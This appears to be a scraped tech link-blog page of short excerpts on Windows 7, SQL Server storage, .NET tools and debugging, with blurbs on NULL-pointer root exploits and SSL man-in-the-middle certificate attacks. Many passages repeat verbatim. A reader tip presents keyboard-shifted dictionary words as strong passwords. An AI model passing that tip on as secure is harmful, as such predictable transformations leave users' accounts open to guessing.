Visual Studio 2010 Theme for Windows 7
Visual Studio 2010 Theme for Windows 7 is available on Rob’s SkyDrive and can be downloaded from here. This theme will only work on Windows 7. For more wallpapers and themes, make sure you visit our Windows 7 Wallpapers and Windows 7 Themes Gallery. Read more: Redmond Pie
Stream Media from Windows 7 to XP with VLC Media Player
Posted by
jasper22
at
14:33
|
So you’ve got yourself a new computer with Windows 7 and you’re itching to take advantage of it’s ability to stream media across your home network. But, the rest of the family is still on Windows XP and you’re not quite ready to shell out the cash for the upgrades. Well, today we’ll show you how to easily stream media from Windows 7 to Windows XP with VLC Media Player. On the host computer running Windows 7, you’ll need to have an account set up with both a username and password. A blank password will not work. The media files will need to be located in a shared folder.Note: If the media files are located within the Public directory, or within the profile of the user account you use to log into the Windows 7 computer, they will be shared automatically. Sharing your Media FoldersOn your Windows 7 computer, right-click on the folder containing the files you’d like to stream and choose Properties.Read more: How-to-geek
Shift Your Fingers One Key to the Right for Easy-to-Remember but Awesome Passwords
Posted by
jasper22
at
14:16
|
You're constantly told how easy it would be to hack your weak passwords, but complicated passwords just aren't something our brains get excited about memorizing. Reader calculusrunner offers a brilliant tip that turns weak passwords into something much, much better. His clever solution: Stick with your weak, dictionary password if you must; just move your fingers over a space on the keyboard. If you want a secure password without having to remember anything complex, try shifting your fingers one set of keys to the right. It will make your password look like gibberish, will often add in punctuation marks, and is quick and simple. When John Pozadzides showed us how he'd hack our weak passwords, he listed his top 10 choices for getting started hacking away at your weak passwords. Let's take a look at how a few of those popular passwords fare when run through calculusrunner's method: * password => [sddeptf
* letmein => ;ry,rom
* money => .pmru
* love => ;pbrSomething longer but still really lame, like, say, "topsecretpassword", becomes "yp[drvtry[sddeptf". These may not be perfect compared to secure password generators, but they're likely orders of magnitude better than a lot of people's go-to passwords. Read more: Lifehacker
* letmein => ;ry,rom
* money => .pmru
* love => ;pbrSomething longer but still really lame, like, say, "topsecretpassword", becomes "yp[drvtry[sddeptf". These may not be perfect compared to secure password generators, but they're likely orders of magnitude better than a lot of people's go-to passwords. Read more: Lifehacker
Is OS/2 Coming Back?
Posted by
jasper22
at
11:30
|
Is IBM considering relaunching OS/2? One source close to IBM says Big Blue plans to repurpose OS/2 services atop a Linux core. IT managers ask, why now?" Hey, back in simpler times OS/2 was super badass. Both of the guys who ran it were hard core. Read more: Slashdot
TeamViewer goes cross-platform, now available for download on Linux
Posted by
jasper22
at
11:24
|
Well, I can now cross yet another application off my list of apps I'd miss if I switched to Linux. TeamViewer, my remote support application of choice, has arrived -- bringing its zero-config screen sharing goodness to Linux. Some of the more recent additions -- like per-application screen sharing via TeamViewer's toolbar button -- haven't made it into the Linux version yet, but things administrators need most are there. Remote (both hosting and control), file transfer, chat (both text and voice), and session recording all work nicely. Partner Lists are also available on Linux, making remote connections to your saved hosts a cinch. Right now, TeamViewer for Linux is beta software. Like other TV betas I've tested on Windows and Mac, however, the Linux version is very usable and every bit as solid as most of the stable release software I run. Read more: DownloadSquad
How To Exploit NULL Pointers
Ever wondered what was so bad about NULL pointer exceptions? An MIT Linux kernel programmer explains how to turn any NULL pointer into a root exploit on Linux. (There was also a previous installment about virtual memory and how to make NULL pointers benign.) Read more: Slashdot
Read more: How to turn any NULL pointer into a root exploit on Linux
Read more: How to turn any NULL pointer into a root exploit on Linux
Understanding RAID for SQL Server: Part 1
Posted by
jasper22
at
11:31
|
Choosing the right number of hard drives and the correct RAID (redundant array of independent disks) configuration when you design your database server can save you a lot of time. If you make a mistake, changing the RAID configuration and moving the database to correct any problems on a deployed server will cause long downtimes and consume IT resources. In fact, we have known people who have purchased new servers in order to mitigate the downtime of deploying a new disk subsystem.
We Are Just Getting StartedFile subsystems for SQL Server is really a "which came first, the chicken or the egg" topic—do we tell you about RAID before we talk about hard drive configuration? Do we talk about the number of physical disks before we explain how the database files are accessed on the disk? Or, should we describe how to reconfigure an old server or how to purchase the best configuration? We need to start somewhere, and we decided to start with RAID. But stay tuned, this is the beginning of a series of blog posts about SQL Server disk subsystems and RAID. Sign up for the RSS feed so you are notified when our next posts are published.
Software RAIDThere are two types of RAID available to the SQL Server administrator: hardware RAID and software RAID. Software RAID is a fancy way of saying Windows RAID, because the only software RAID available is the one that comes with Windows Server 2003 and Windows Server 2008. When should you use Windows RAID with SQL Server? The answer is never. Windows RAID is implemented at the file system level (not the disk subsystem level) and involves diverting CPU resources from the server into managing the RAID. With SQL Server, you need to retain this CPU horsepower to handle the queries against the database. Plus, modern servers come with RAID built into the motherboard, or they have inexpensive add-on RAID options. Because of the low price (or no price), there is no financial benefit from not using the better-performing hardware RAID. So why do we mention it? Just in case you were thinking about using it.
Hardware RAIDRAID is the simulation of a single disk over more than one physical disk drive. This simulation can be done in a variety of different ways, called levels. Each level has advantages and drawbacks—let's discuss each as it relates to SQL Server.
RAID level 0.SQL Server 2008 Books Online says "This level [0] is also known as disk striping. . . . Data is divided into blocks and spread in a fixed order among all disks in an array. RAID 0 improves read and write performance by spreading operations across multiple disks" ("RAID Levels and SQL Server," SQL Server 2008 Books Online, MSDN). Another way to think about RAID level 0 is that a single write happens on only one disk, and reads can be done asynchronously across all the physical disk heads in the array.Read more: Siemens Teamcenter on SQL Server
We Are Just Getting StartedFile subsystems for SQL Server is really a "which came first, the chicken or the egg" topic—do we tell you about RAID before we talk about hard drive configuration? Do we talk about the number of physical disks before we explain how the database files are accessed on the disk? Or, should we describe how to reconfigure an old server or how to purchase the best configuration? We need to start somewhere, and we decided to start with RAID. But stay tuned, this is the beginning of a series of blog posts about SQL Server disk subsystems and RAID. Sign up for the RSS feed so you are notified when our next posts are published.
Software RAIDThere are two types of RAID available to the SQL Server administrator: hardware RAID and software RAID. Software RAID is a fancy way of saying Windows RAID, because the only software RAID available is the one that comes with Windows Server 2003 and Windows Server 2008. When should you use Windows RAID with SQL Server? The answer is never. Windows RAID is implemented at the file system level (not the disk subsystem level) and involves diverting CPU resources from the server into managing the RAID. With SQL Server, you need to retain this CPU horsepower to handle the queries against the database. Plus, modern servers come with RAID built into the motherboard, or they have inexpensive add-on RAID options. Because of the low price (or no price), there is no financial benefit from not using the better-performing hardware RAID. So why do we mention it? Just in case you were thinking about using it.
Hardware RAIDRAID is the simulation of a single disk over more than one physical disk drive. This simulation can be done in a variety of different ways, called levels. Each level has advantages and drawbacks—let's discuss each as it relates to SQL Server.
RAID level 0.SQL Server 2008 Books Online says "This level [0] is also known as disk striping. . . . Data is divided into blocks and spread in a fixed order among all disks in an array. RAID 0 improves read and write performance by spreading operations across multiple disks" ("RAID Levels and SQL Server," SQL Server 2008 Books Online, MSDN). Another way to think about RAID level 0 is that a single write happens on only one disk, and reads can be done asynchronously across all the physical disk heads in the array.Read more: Siemens Teamcenter on SQL Server
Understanding RAID for SQL Server: Part 1
Posted by
jasper22
at
11:31
|
Choosing the right number of hard drives and the correct RAID (redundant array of independent disks) configuration when you design your database server can save you a lot of time. If you make a mistake, changing the RAID configuration and moving the database to correct any problems on a deployed server will cause long downtimes and consume IT resources. In fact, we have known people who have purchased new servers in order to mitigate the downtime of deploying a new disk subsystem.
We Are Just Getting StartedFile subsystems for SQL Server is really a "which came first, the chicken or the egg" topic—do we tell you about RAID before we talk about hard drive configuration? Do we talk about the number of physical disks before we explain how the database files are accessed on the disk? Or, should we describe how to reconfigure an old server or how to purchase the best configuration? We need to start somewhere, and we decided to start with RAID. But stay tuned, this is the beginning of a series of blog posts about SQL Server disk subsystems and RAID. Sign up for the RSS feed so you are notified when our next posts are published.
Software RAIDThere are two types of RAID available to the SQL Server administrator: hardware RAID and software RAID. Software RAID is a fancy way of saying Windows RAID, because the only software RAID available is the one that comes with Windows Server 2003 and Windows Server 2008. When should you use Windows RAID with SQL Server? The answer is never. Windows RAID is implemented at the file system level (not the disk subsystem level) and involves diverting CPU resources from the server into managing the RAID. With SQL Server, you need to retain this CPU horsepower to handle the queries against the database. Plus, modern servers come with RAID built into the motherboard, or they have inexpensive add-on RAID options. Because of the low price (or no price), there is no financial benefit from not using the better-performing hardware RAID. So why do we mention it? Just in case you were thinking about using it.
Hardware RAIDRAID is the simulation of a single disk over more than one physical disk drive. This simulation can be done in a variety of different ways, called levels. Each level has advantages and drawbacks—let's discuss each as it relates to SQL Server.
RAID level 0.SQL Server 2008 Books Online says "This level [0] is also known as disk striping. . . . Data is divided into blocks and spread in a fixed order among all disks in an array. RAID 0 improves read and write performance by spreading operations across multiple disks" ("RAID Levels and SQL Server," SQL Server 2008 Books Online, MSDN). Another way to think about RAID level 0 is that a single write happens on only one disk, and reads can be done asynchronously across all the physical disk heads in the array.Read more: Siemens Teamcenter on SQL Server
We Are Just Getting StartedFile subsystems for SQL Server is really a "which came first, the chicken or the egg" topic—do we tell you about RAID before we talk about hard drive configuration? Do we talk about the number of physical disks before we explain how the database files are accessed on the disk? Or, should we describe how to reconfigure an old server or how to purchase the best configuration? We need to start somewhere, and we decided to start with RAID. But stay tuned, this is the beginning of a series of blog posts about SQL Server disk subsystems and RAID. Sign up for the RSS feed so you are notified when our next posts are published.
Software RAIDThere are two types of RAID available to the SQL Server administrator: hardware RAID and software RAID. Software RAID is a fancy way of saying Windows RAID, because the only software RAID available is the one that comes with Windows Server 2003 and Windows Server 2008. When should you use Windows RAID with SQL Server? The answer is never. Windows RAID is implemented at the file system level (not the disk subsystem level) and involves diverting CPU resources from the server into managing the RAID. With SQL Server, you need to retain this CPU horsepower to handle the queries against the database. Plus, modern servers come with RAID built into the motherboard, or they have inexpensive add-on RAID options. Because of the low price (or no price), there is no financial benefit from not using the better-performing hardware RAID. So why do we mention it? Just in case you were thinking about using it.
Hardware RAIDRAID is the simulation of a single disk over more than one physical disk drive. This simulation can be done in a variety of different ways, called levels. Each level has advantages and drawbacks—let's discuss each as it relates to SQL Server.
RAID level 0.SQL Server 2008 Books Online says "This level [0] is also known as disk striping. . . . Data is divided into blocks and spread in a fixed order among all disks in an array. RAID 0 improves read and write performance by spreading operations across multiple disks" ("RAID Levels and SQL Server," SQL Server 2008 Books Online, MSDN). Another way to think about RAID level 0 is that a single write happens on only one disk, and reads can be done asynchronously across all the physical disk heads in the array.Read more: Siemens Teamcenter on SQL Server
Microsoft Partner Network Technical Services Gadget
Posted by
jasper22
at
11:30
|
This gadget is designed for Microsoft Partners to access online technical services more conveniently. Users can directly visit the queues specific for Microsoft Partners through the gadget on the desktop. Read more: MS Download
Combres 2.0 - A Library for ASP.NET Website Optimization
Posted by
jasper22
at
11:30
|
A few months ago, I released the beta version of Combres 1.0, a .NET library that automates the application of many web performance optimization techniques for ASP.NET applications. I also wrote an article about that release to demonstrate the features of the library. Since that article was published, there have been a couple of minor releases until last week when a major release, version 2.0, was out. There are many changes in version 2.0 that it wouldn't make sense to update the old article, so I decide to write this article to introduce readers about Combres 2.0. This is supposed to be a self-contained article, so you don't need to refer to the old article to understand about Combres.
Combres in a Nutshell The development of Combres was inspired by the simple, yet highly effective, website optimization techniques described in a book by Steve Sounders and the documentation of the FireFox's addon YSlow. Specifically, Combres automates the application of the following website optimization techniques in your ASP.NET MVC or ASP.NET Web Forms applications while requiring you to do very little work. * Make fewer HTTP requests. Using Combres, your describe your website's resources, including JavaScript and CSS files, in an XML config file and group them into different resource sets. Combres will combine resources in the same resource set and make the combined content available in 1 single HTTP request.
* Add Expires or Cache-Control header. Combres automatically emits Expires and Cache-Control response headers in responding to the HTTP request for each resource set based on the caching information you specify in the XML config file. In addition, Combres caches the combined content on the server so that the combination process, among other steps described below, won't be executed for every new user (or when an existing user's browser cache is invalidated).
* Gzip components. Combres will detect Gzip and/or Deflate support in the users' browser and apply the appropriate compression algorithm on each resource set's combined content before sending it to the browser. If the browser doesn't support compression, Combres will return the raw output instead.
* Minify JavaScript. Combres can minify the contents of both JavaScript and CSS resources. For JavaScript resources, you can configure Combres to choose among the following minification engines: YUI Compressor for .NET, Microsoft Ajax Minifier and Google Closure Compiler. For each of these engines, Combres allows you to configure all specific attributes so that you can maximize its effectiveness. Each resource set is usually assigned with a specific minification engine although if you need to, you can have resources within the same resource set minified using separate minification engines.
* Configure ETags. Combres emits ETags for each resource set's combined content. When the browser sends back an ETag, Combres will check to see if that ETag identifying the latest version of the resource set or not, if not it will push the new content to the browser; otherwise, it will return a Not Modified (304) response status. In short, Combres helps combine, minify, compress, append appropriate headers and cache JavaScript and CSS resources in your application. All you need to do are creating an XML config file describing what you want Combres to do and adding a few lines of code to register and use Combres in your applications. In this article, we'll explore these core features as well as more advanced features of Combres. Read more: Codeproject
Combres in a Nutshell The development of Combres was inspired by the simple, yet highly effective, website optimization techniques described in a book by Steve Sounders and the documentation of the FireFox's addon YSlow. Specifically, Combres automates the application of the following website optimization techniques in your ASP.NET MVC or ASP.NET Web Forms applications while requiring you to do very little work. * Make fewer HTTP requests. Using Combres, your describe your website's resources, including JavaScript and CSS files, in an XML config file and group them into different resource sets. Combres will combine resources in the same resource set and make the combined content available in 1 single HTTP request.
* Add Expires or Cache-Control header. Combres automatically emits Expires and Cache-Control response headers in responding to the HTTP request for each resource set based on the caching information you specify in the XML config file. In addition, Combres caches the combined content on the server so that the combination process, among other steps described below, won't be executed for every new user (or when an existing user's browser cache is invalidated).
* Gzip components. Combres will detect Gzip and/or Deflate support in the users' browser and apply the appropriate compression algorithm on each resource set's combined content before sending it to the browser. If the browser doesn't support compression, Combres will return the raw output instead.
* Minify JavaScript. Combres can minify the contents of both JavaScript and CSS resources. For JavaScript resources, you can configure Combres to choose among the following minification engines: YUI Compressor for .NET, Microsoft Ajax Minifier and Google Closure Compiler. For each of these engines, Combres allows you to configure all specific attributes so that you can maximize its effectiveness. Each resource set is usually assigned with a specific minification engine although if you need to, you can have resources within the same resource set minified using separate minification engines.
* Configure ETags. Combres emits ETags for each resource set's combined content. When the browser sends back an ETag, Combres will check to see if that ETag identifying the latest version of the resource set or not, if not it will push the new content to the browser; otherwise, it will return a Not Modified (304) response status. In short, Combres helps combine, minify, compress, append appropriate headers and cache JavaScript and CSS resources in your application. All you need to do are creating an XML config file describing what you want Combres to do and adding a few lines of code to register and use Combres in your applications. In this article, we'll explore these core features as well as more advanced features of Combres. Read more: Codeproject
VisualHG
Posted by
jasper22
at
11:30
|
Mercurial Source Control Plugin for MS Visual Studio * VisualHG indicates file status within the project files tree of MSVC
* Tracks adding, moving and renaming of file actions
* Give you dialogs for committing changes, viewing detailed status of files and history and many more. Using TortoiseHG as its backend
* Everything directly from your workspace via context menu and a toolbar
* Compatible with MSVS 2005, MSVS 2008 and also MSVS 2010 RC
* Support for Mercurial Subrepositories
* Recogonize projects under version control that are not in the same folder as the solution
* File status icon for renamed files
* File state indicating tooltipsRead more: Codeplex
* Tracks adding, moving and renaming of file actions
* Give you dialogs for committing changes, viewing detailed status of files and history and many more. Using TortoiseHG as its backend
* Everything directly from your workspace via context menu and a toolbar
* Compatible with MSVS 2005, MSVS 2008 and also MSVS 2010 RC
* Support for Mercurial Subrepositories
* Recogonize projects under version control that are not in the same folder as the solution
* File status icon for renamed files
* File state indicating tooltipsRead more: Codeplex
SOSEX - A New Debugging Extension for Managed Code
Posted by
jasper22
at
11:20
|
Over the course of the last few months, I've really put lots of effort into understanding and utilizing WinDbg. As a primarily C# developer, this meant also becoming intimately familiar with the SOS extension. Though a bit tedious, this exercise has already paid rich dividends in my debugging experience. As powerful and handy as SOS is, however, it has some annoying limitations and quirks. My personal peeves with SOS, combined with my desire to learn to write a WinDbg extension, led me to develop SOSEX, a debugging extension for managed code that begins to alleviate some of my frustrations with SOS. SOSEX (available in x86 and x64 versions) provides 8 easy-to-use commands: !dumpgen (dumps the contents of a GC generation), !gcgen (indicates the GC generation of a given object), !refs (lists all references to and from the specified object), !bpsc (breakpoint, source code), !bpmo (breakpoint, method offset), !vars (dump all args and local variables), !isf (inspect static field) and !dlk (deadlock detection). The rest of this post will provide a bit more detail about each command and how they can save you time. Use the !help command for a list of commands and !help <command name> for the syntax and usage of each command.
!dumpgen and !gcgenWith SOS, you can dump the contents of the heap like so:0:000> !dumpheap -short
00000642787c7370
00000642787c7388
00000642787c73b0
00000642787c7410
00000642787c7440
00000642787c7498
00000642787c74f0...The problem with this is that there is no easy way to tell from the output which generation each object belongs to. You can follow up the call to !dumpheap with !eeheap -gc, which will provide the necessary information to determine generations. However, determining the contents of, say, generation 2 using this method is very tedious. Here's the output of !eeheap -gc for a dual-processor system in server GC mode: 0:000> !eeheap -gc
Number of GC Heaps: 2
------------------------------
Heap 0 (0000000002264180)
generation 0 starts at 0x000000007fff0098
generation 1 starts at 0x000000007fff0080
generation 2 starts at 0x000000007fff0068
ephemeral segment allocation context: none
segment begin allocated size
0000000002271b80 00000642787c7370 0000064278809088 0x0000000000041d18(269592)
000000007fff0000 000000007fff0068 0000000080002fe8 0x0000000000012f80(77696)
Large object heap starts at 0x00000000ffff0068
segment begin allocated size
00000000ffff0000 00000000ffff0068 00000000ffff80c8 0x0000000000008060(32864)
Heap Size 0x5ccf8(380152)
------------------------------
Heap 1 (0000000002264e00)
generation 0 starts at 0x00000000bfff0098
generation 1 starts at 0x00000000bfff0080
generation 2 starts at 0x00000000bfff0068
ephemeral segment allocation context: none
segment begin allocated size
00000000bfff0000 00000000bfff0068 00000000bfff00b0 0x0000000000000048(72)
Large object heap starts at 0x000000010fff0068
segment begin allocated size
000000010fff0000 000000010fff0068 000000010fff0080 0x0000000000000018(24)
Heap Size 0x60(96)
------------------------------
GC Heap Size 0x5cd58(380248) As you can see, you have a lot of work to do in order to pick through the output of !dumpheap and compare object addresses to the segment addresses provided by !eeheap -gc. Enter SOSEX's !dumpgen command. Read more: Steve's Techspot, SOSEX v4.0 Now Available
!dumpgen and !gcgenWith SOS, you can dump the contents of the heap like so:0:000> !dumpheap -short
00000642787c7370
00000642787c7388
00000642787c73b0
00000642787c7410
00000642787c7440
00000642787c7498
00000642787c74f0...The problem with this is that there is no easy way to tell from the output which generation each object belongs to. You can follow up the call to !dumpheap with !eeheap -gc, which will provide the necessary information to determine generations. However, determining the contents of, say, generation 2 using this method is very tedious. Here's the output of !eeheap -gc for a dual-processor system in server GC mode: 0:000> !eeheap -gc
Number of GC Heaps: 2
------------------------------
Heap 0 (0000000002264180)
generation 0 starts at 0x000000007fff0098
generation 1 starts at 0x000000007fff0080
generation 2 starts at 0x000000007fff0068
ephemeral segment allocation context: none
segment begin allocated size
0000000002271b80 00000642787c7370 0000064278809088 0x0000000000041d18(269592)
000000007fff0000 000000007fff0068 0000000080002fe8 0x0000000000012f80(77696)
Large object heap starts at 0x00000000ffff0068
segment begin allocated size
00000000ffff0000 00000000ffff0068 00000000ffff80c8 0x0000000000008060(32864)
Heap Size 0x5ccf8(380152)
------------------------------
Heap 1 (0000000002264e00)
generation 0 starts at 0x00000000bfff0098
generation 1 starts at 0x00000000bfff0080
generation 2 starts at 0x00000000bfff0068
ephemeral segment allocation context: none
segment begin allocated size
00000000bfff0000 00000000bfff0068 00000000bfff00b0 0x0000000000000048(72)
Large object heap starts at 0x000000010fff0068
segment begin allocated size
000000010fff0000 000000010fff0068 000000010fff0080 0x0000000000000018(24)
Heap Size 0x60(96)
------------------------------
GC Heap Size 0x5cd58(380248) As you can see, you have a lot of work to do in order to pick through the output of !dumpheap and compare object addresses to the segment addresses provided by !eeheap -gc. Enter SOSEX's !dumpgen command. Read more: Steve's Techspot, SOSEX v4.0 Now Available
Man-in-the-Middle Attacks Against SSL
Posted by
jasper22
at
11:13
|
Says Matt Blaze: A decade ago, I observed that commercial certificate authorities protect you from anyone from whom they are unwilling to take money. That turns out to be wrong; they don't even do that much. Scary research by Christopher Soghoian and Sid Stamm: Abstract: This paper introduces a new attack, the compelled certificate creation attack, in which government agencies compel a certificate authority to issue false SSL certificates that are then used by intelligence agencies to covertly intercept and hijack individuals' secure Web-based communications. We reveal alarming evidence that suggests that this attack is in active use. Finally, we introduce a lightweight browser add-on that detects and thwarts such attacks. Even more scary, Soghoian and Stamm found that hardware to perform this attack is being produced and sold: At a recent wiretapping convention, however, security researcher Chris Soghoian discovered that a small company was marketing internet spying boxes to the feds. The boxes were designed to intercept those communications -- without breaking the encryption -- by using forged security certificates, instead of the real ones that websites use to verify secure connections. To use the appliance, the government would need to acquire a forged certificate from any one of more than 100 trusted Certificate Authorities. [...] The company in question is known as Packet Forensics.... According to the flyer: "Users have the ability to import a copy of any legitimate key they obtain (potentially by court order) or they can generate 'look-alike' keys designed to give the subject a false sense of confidence in its authenticity." The product is recommended to government investigators, saying "IP communication dictates the need to examine encrypted traffic at will." And, "Your investigative staff will collect its best evidence while users are lulled into a false sense of security afforded by web, e-mail or VOIP encryption." Matt Blaze has the best analysis. Read his whole commentary; this is just the ending: It's worth pointing out that, from the perspective of a law enforcement or intelligence agency, this sort of surveillance is far from ideal. A central requirement for most government wiretapping (mandated, for example, in the CALEA standards for telephone interception) is that surveillance be undetectable. But issuing a bogus web certificate carries with it the risk of detection by the target, either in real-time or after the fact, especially if it's for a web site already visited. Although current browsers don't ordinarily detect unusual or suspiciously changed certificates, there's no fundamental reason they couldn't (and the Soghoian/Stamm paper proposes a Firefox plugin to do just that). In any case, there's no reliable way for the wiretapper to know in advance whether the target will be alerted by a browser that scrutinizes new certificates. Read more: Bruce Schneier
25 Startups That Will Be Shaping The Next Web
Posted by
jasper22
at
11:12
|
April promises to be quite the busy month for European startups that are preparing to launch on stage. As Mike Butcher wrote earlier today, GeeknRolla will be rocking London on April 20, with a host of great speakers and fledgling tech companies dying to show off their stuff. A week after that, I’ll be attending the fifth edition of The Next Web conference, an annual event held in Amsterdam, The Netherlands.At the latter event, 25 startups will be pitching a live audience of over 1,000 attendees: venture capitalists, press and early adopters will be once again out in full force for the occasion. Keep reading if you’re interested in attending as well. The organizers of The Next Web 2010 say they have reviewed 245 submissions, looked at 73 one-minute video pitches and ultimately selected 45 companies for a back-to-back interview round. In the end, 25 startups made the cut – they will get the chance to talk up their company on the main stage, after which a jury of professionals (myself included) will jointly decide who delivered the most convincing pitch. All finalists will launch a new service or announce a major update at the conference. The audience gets to decide about two startups from the Startup Arena, but the 23 that have been pre-selected are:Tribe of Noise – “A worldwide community connecting musicians & companies”
Inbox2 – “One stream for all your accounts”
Fashiolista – “Discover, shop and share your style”
MailSuite (stealth)
Pipio – “The Easiest Way to Start, Organize,and Discover Conversations”
Distimo – “App store analytics”
Twittercounter – Twitter-powered public statistics provider
Ecwid – “A new breed of shopping cart software”
DoubleDutch – “The only white label, location-based iPhone app”
English Attack! – “The first 100% entertainment-based method of learning English”
Fits.me – “Virtual Fitting Room for Online Clothing Retailers”
NextWidgets – “Your online shop miniaturized to the size of a banner ad”
Feest.je (stealth)
22tracks – “New music, the easy way”
(more...)Read more: TechCrunch
Inbox2 – “One stream for all your accounts”
Fashiolista – “Discover, shop and share your style”
MailSuite (stealth)
Pipio – “The Easiest Way to Start, Organize,and Discover Conversations”
Distimo – “App store analytics”
Twittercounter – Twitter-powered public statistics provider
Ecwid – “A new breed of shopping cart software”
DoubleDutch – “The only white label, location-based iPhone app”
English Attack! – “The first 100% entertainment-based method of learning English”
Fits.me – “Virtual Fitting Room for Online Clothing Retailers”
NextWidgets – “Your online shop miniaturized to the size of a banner ad”
Feest.je (stealth)
22tracks – “New music, the easy way”
(more...)Read more: TechCrunch
PowerPack for VHD/VDI/VMDK Inventory
Posted by
jasper22
at
11:12
|
If you like myself have a bunch of virtual machine on your laptop you are going to love the Virtual Disk Inventory PowerPack which Kenneth Bell has just posted.The pack quickly gives you a list of the VHD, VDI, and VMDK files you have on the computer, and for each machine provides information on the computer name and operating system Read more: Dmitry’s PowerBlog: PowerShell and beyond
Mono.Cecil 0.9 "cecil/light"
Posted by
jasper22
at
11:07
|
I started working on Mono.Cecil during the fall of 2004. In its current incarnation, it served me and a lot of people very well. But looking at it now, it aged quite a bit. The code still compiles on .net 1.1, is using old conventions, doesn’t have a real test suite, is quite memory hungry, and is not that optimized. Which doesn’t prevent it to be a useful and wide used library, but looking back; I could have done a lot of things differently. And doing things differently is basically what I’ve been doing for the past two years in my free time. What originally started as a refactoring of Mono.Cecil for the decompiler, ended up as a rewrite from the ground up. And today I’m excited to make public what is the next version of Cecil, which I’ve been fondly calling “cecil/light”. Let’s start with a warning; this version contains breaking changes with the previous API. I didn’t promise API stability for the previous code, but this iteration of Mono.Cecil, tagged 0.9, is a huge step towards 1.0 and API stability. But let’s focus for a while on the bright and new side. Mono.Cecil 0.9 comes with: * A cleaned and genericized API, I took this opportunity to clean some parts I hated in the old API.
* A smaller and easier to maintain C#3 code base (Mono.Cecil 0.9 compiled with optimizations by csc is about 250k against almost 400k for 0.6) which only requires a .net 2.0 compatible runtime.
* A test suite which is very easy to augment.
* Better support for pdb and mdb files and strong name assemblies.
* Complete support for PE32+ assemblies.
* Bug fixes that weren’t possible without large changes in the old code.
* Less memory consumption.
* Lazy loading of every metadata element.
* Speed and optimizations.
* Complete Silverlight support.
* A beginning of documentation on a wiki.
* A collection of extension methods to add features to Cecil when they’re not necessary to the core assembly. I ported a few of my projects to this version of Cecil already, and it shows great results. I didn’t spend more than four hours per project to adjust the code in a branch. There’s a migration page on the wiki to help you. If it doesn’t answer your question, reach us on the mono-cecil group. Read more: Jb in nutshell, Mono.Cecil
* A smaller and easier to maintain C#3 code base (Mono.Cecil 0.9 compiled with optimizations by csc is about 250k against almost 400k for 0.6) which only requires a .net 2.0 compatible runtime.
* A test suite which is very easy to augment.
* Better support for pdb and mdb files and strong name assemblies.
* Complete support for PE32+ assemblies.
* Bug fixes that weren’t possible without large changes in the old code.
* Less memory consumption.
* Lazy loading of every metadata element.
* Speed and optimizations.
* Complete Silverlight support.
* A beginning of documentation on a wiki.
* A collection of extension methods to add features to Cecil when they’re not necessary to the core assembly. I ported a few of my projects to this version of Cecil already, and it shows great results. I didn’t spend more than four hours per project to adjust the code in a branch. There’s a migration page on the wiki to help you. If it doesn’t answer your question, reach us on the mono-cecil group. Read more: Jb in nutshell, Mono.Cecil
Using Windows 7 libraries in .NET
Posted by
jasper22
at
11:05
|
With the release of Windows 7, a new feature was introduced – libraries. A library is basically a content placeholder for any files or folders. Being a virtual entity, a user doesn’t copy the folder or file to a library, but much rather adds a reference to it. This gives the possibility to make a file or folder a member of multiple libraries. For example, a user has a file called reports.txt and two libraries – Reports and ToSend. Later on, he adds the reference to reports.txt on both Reports and SendTo. The file remains in its original location, while both libraries contain the reference. This makes file organization and tracking a lot easier. Read more: Dzone
Adobe Launches Photoshop CS5 and Photoshop CS5 Extended
Posted by
jasper22
at
11:03
|
Milestone Release Celebrates 20 Years of Unrivaled Image Editing and InnovationSAN JOSE, Calif., — April 12, 2010 — Adobe Systems Incorporated (Nasdaq:ADBE) today announced Adobe® Photoshop® CS5 and Photoshop CS5 Extended software, must-have releases of the professional industry standard for digital imaging. With millions of users celebrating the product’s 20th anniversary this year, Photoshop CS5 builds upon a rich history of innovation and leadership with groundbreaking features and performance gains that boost creativity and workflow efficiency. Packing in more technological advancements from Adobe Labs than any other release and incorporating enhancements to everyday tasks requested by the Photoshop community, the software has greater intelligence and awareness of the content within images, allowing for complex and magical manipulation in just a few clicks. Adobe Photoshop CS5 Extended delivers everything in Photoshop CS5, as well as advanced tools for 3-D which address the unique needs of the video, Web, medical, manufacturing and engineering industries. Photoshop CS5 and Photoshop CS5 Extended will be available as stand-alone applications or key components of the Adobe Creative Suite® 5 family (see separate releases).“The past two decades have demonstrated an amazing interplay between customers who want to push the limits of their personal creativity and a passionate team of Adobe engineers who make those visions a reality,” said Kevin Connor, vice president of product management for professional digital imaging at Adobe. “We experienced this firsthand when we posted a ‘sneak peek’ video of the team’s work on the Content Aware Fill feature a few weeks ago. It quickly became the number one viral video online, with close to 2 million views and its ‘magic’ was one of the top trending Twitter topics of discussion. This version of Photoshop has some of the most innovative and extraordinary technologies to ever come from our labs and clearly customers are already clamoring for it.” Read more: PhotoshopNews.com
A SQL Server DBA myth a day: (12/30) tempdb should always have one data file per processor core
Posted by
jasper22
at
11:02
|
Myth #12: tempdb should always have one data file per processor core.FALSESigh. This is one of the most frustrating myths because there's so much 'official' information from Microsoft, and other blog posts that persists this myth. There's only one tempdb per instance, and lots of things use it, so it's often a performance bottleneck. You guys know that already. But when does a performance problem merit creating extra tempdb data files? When you see PAGELATCH waits on tempdb, you've got contention for in-memory allocation bitmaps. When you see PAGEIOLATCH waits on tempdb, you've got contention at the I/O subsystem level. You can think of a latch as kind of like a traditional lock, but much lighter wait, much more transitory, and used by the Storage Engine internally to control access to internal structures (like in-memory copies of database pages). Fellow MVP Glenn Berry (twitter|blog) has a blog post with some neat scripts using the sys.dm_os_wait_stats DMV - the first one will show you what kind of wait is most prevalent on your server. If you see that it's PAGELATCH waits, you can use this script from newly-minted MCM and Microsoft DBA Robert Davis (twitter|blog). It uses the sys.dm_os_waiting_tasks DMV to break apart the wait resource and let you know what's being waited on in tempdb. If you're seeing PAGELATCH waits on tempdb, then you can mitigate it using trace flag 1118 (fully documented in KB 328551) and creating extra tempdb data files. I wrote a long blog post debunking some myths around this trace flag and why it's still potentially required in SQL 2005 and 2008 - see Misconceptions around TF 1118. On SQL Server 2000, the recommendation was one tempdb data file for each processor core. On 2005 and 2008, that recommendation persists, but because of some optimizations (see my blog post) you may not need one-to-one - you may be ok with the number of tempdb data files equal to 1/4 to 1/2 the number of processor cores. Now this is all one big-ass generalization. I heard just last week of a customer who's tempdb workload was so high that they had to use 64 tempdb data files on a system with 32 processor cores - and that was the only way for them to alleviate contention. Does this mean it's a best practice? Absolutely not! So, why is one-to-one not always a good idea? Too many tempdb data files can cause performance problems for another reason. If you have a workload that uses query plan operators that require lots of memory (e.g. sorts), the odds are that there won't be enough memory on the server to accomodate the operation, and it will spill out to tempdb. If there are too many tempdb data files, then the writing out of the temporarily-spilled data can be really 